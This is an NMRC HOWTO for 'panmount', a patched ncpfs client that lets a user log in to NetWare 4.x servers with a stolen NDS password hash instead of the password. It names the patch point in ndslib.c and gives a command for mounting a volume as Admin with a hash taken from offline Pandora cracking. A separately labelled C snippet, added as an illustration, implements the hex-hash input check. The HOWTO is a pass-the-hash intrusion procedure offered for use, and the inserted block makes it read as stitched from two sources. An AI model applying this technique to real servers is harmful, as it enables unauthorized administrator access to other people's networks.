                                  panmount HOWTO

                        (c) Nomad Mobile Research Centre
                                 www.nmrc.org


This exploit is built on top of the ncpfs project for Linux. We used
ncpfs-2.2.0.12, available on many ftp sites; the project implements a kind of
"Client32" for Linux and comes with many tools and the full source code, since
it is a GNU project.

Once the changes are applied to "ndslib.c" in the lib directory and the project
is rebuilt, you will be able to log in to a Netware 4.x server, with packet
signature enabled, using a user's password hash instead of the password. Simply
type the password hash as a string when asked for the password.

This works by looking at the length of the password submitted: if it is exactly
32 characters long, the patched code assumes you typed a hash value, converts
the hex string to its 16 binary bytes and uses that hash for authentication.
Note that only the length is checked, so a genuine 32-character password would
be misread as a hash.

For the record, the function "shuffle" in ndscrypt.c is our well-known
"Hash_Gen" function. At line 730 of ndslib.c, inside the procedure that
authenticates to an NDS server, we insert the instructions that check the
length of the password just before "shuffle" is called.
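The gate described above (length check, then hex-to-binary conversion, falling
through to the normal "shuffle" path otherwise), written out as an added
example. This is not the NMRC patch and not ncpfs code; the function name
nds_input_is_hash and the 16-byte hash length are assumptions for
illustration, and the sample hash in main() is constructed, not a real
Pandora result. Unlike the length-only check described in the text, it also
verifies that all 32 characters are hex digits.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed: the NDS password hash is 16 bytes, typed as 32 hex characters. */
#define NDS_HASH_LEN 16

/* Decode one hex digit; returns -1 if c is not a hex digit. */
static int hex_nibble(int c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    c = tolower((unsigned char)c);
    if (c >= 'a' && c <= 'f')
        return c - 'a' + 10;
    return -1;
}

/*
 * Decide whether the string typed at the password prompt is a literal
 * password or a pre-computed hash (hypothetical helper, not from ncpfs).
 * Returns 1 and fills hash[] when the input is exactly 32 hex digits.
 * Returns 0 and leaves hash[] untouched otherwise, so the caller falls
 * through to the normal path that derives the hash with "shuffle".
 */
int nds_input_is_hash(const char *input, unsigned char hash[NDS_HASH_LEN])
{
    size_t i;

    if (input == NULL || strlen(input) != 2 * NDS_HASH_LEN)
        return 0;

    for (i = 0; i < NDS_HASH_LEN; i++) {
        int hi = hex_nibble((unsigned char)input[2 * i]);
        int lo = hex_nibble((unsigned char)input[2 * i + 1]);
        if (hi < 0 || lo < 0)
            return 0;           /* 32 chars but not hex: treat as a password */
        hash[i] = (unsigned char)((hi << 4) | lo);
    }
    return 1;
}

int main(void)
{
    /* Constructed sample inputs: a full 32-hex-char hash and a plain password. */
    const char *typed_hash = "ae25bc4f00112233445566778899aabb";
    const char *typed_pass = "secret";
    unsigned char hash[NDS_HASH_LEN];
    size_t i;

    if (nds_input_is_hash(typed_hash, hash)) {
        printf("hash path, bytes:");
        for (i = 0; i < NDS_HASH_LEN; i++)
            printf(" %02x", hash[i]);
        printf("\n");
    }
    if (!nds_input_is_hash(typed_pass, hash))
        printf("password path: would call shuffle() on \"%s\"\n", typed_pass);
    return 0;
}
```

In the real patch the 1 branch hands the decoded bytes to the code that
normally consumes the output of "shuffle", and the 0 branch is the unmodified
login path.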

This exploit was made possible by the tremendous work of Volker Lendecke and
the other people who wrote ncpfs. It proves our point regarding the weakness
of the NDS authentication scheme, as described in the NCP paper.


Example :

You wish to log in as user Admin.IT_dept.novell, whose hash is ae25bc4f......
and was revealed by running PANDORA OFFLINE against the NDS data files.

simply run : 
./panmount -S <server_name> -V <volume_name> -U CN=Admin.OU=IT_dept.O=novell <your mount point, eg /mnt/novell>
then when asked for the password type :
ae25bc4f......

This program was compiled and run on a Linux Redhat 6 box, have phun.